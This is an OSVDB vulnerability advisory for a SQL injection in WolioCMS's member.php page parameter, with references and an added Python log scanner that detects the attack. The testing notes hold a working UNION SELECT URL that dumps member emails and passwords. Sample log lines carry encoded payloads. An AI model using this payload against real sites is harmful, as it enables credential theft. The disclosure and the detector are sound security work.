WolioCMS member.php page Action id Variable SQL Injection

2007-07-30T00:00:00
ID OSVDB:36351
Type osvdb
Reporter k1tk4t (k1k4t@newhack.org)
Modified 2007-07-30T00:00:00

Description

Technical Description

This vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.

Manual Testing Notes

http://[target]/_woliocms/member.php?member=admin&act=page&id='//UNION//ALL//SELECT//null,null,concat(member_email,'-',member_password),null,null,null,null,null,null,null//FROM//member/*
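
A log check for the request pattern above, added here as an example and not part of the original advisory: it flags member.php requests with act=page whose id value, after decoding, contains a single quote (the character magic_quotes_gpc would have escaped) or UNION SELECT and comment markers. It goes slightly beyond the test URL by also undoing repeated percent-encoding. Assumptions: a combined-format access log that records the query string; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markers of a UNION-based injection like the one in the advisory's test URL.
SQLI_RE = re.compile(r"'|\bunion\b.*\bselect\b|/\*|--", re.IGNORECASE | re.DOTALL)


def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding so that %2527 is seen as a quote."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_id(log_line):
    """Return the decoded id value if the line is a member.php?act=page
    request whose id carries SQL injection markers, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/member.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # decodes once
    if params.get("act", [""])[0] != "page":
        return None
    for raw in params.get("id", []):
        value = decode_fully(raw)
        if SQLI_RE.search(value):
            return value
    return None


def scan(lines):
    """Return (client address, decoded id) for every flagged line."""
    return [(line.split()[0], hit) for line in lines if (hit := suspicious_id(line))]


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jul/2007:10:00:01 +0000] "GET /_woliocms/member.php?member=admin&act=page&id=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [30/Jul/2007:10:02:17 +0000] "GET /_woliocms/member.php?member=admin&act=page&id=%27%20UNION%20ALL%20SELECT%20null%20FROM%20member/* HTTP/1.1" 200 812',
    '192.0.2.44 - - [30/Jul/2007:10:02:40 +0000] "GET /_woliocms/member.php?member=admin&act=page&id=%2527 HTTP/1.1" 200 640',
    '192.0.2.10 - - [30/Jul/2007:10:03:05 +0000] "GET /_woliocms/index.php?id=%27 HTTP/1.1" 200 300',
]
```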

References:

Secunia Advisory ID: 26270
Related OSVDB ID: 36352
Other Advisory URL: http://milw0rm.com/exploits/4246
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-07/0360.html
ISS X-Force ID: 35678
FrSIRT Advisory: ADV-2007-2726
CVE-2007-4156
Bugtraq ID: 25134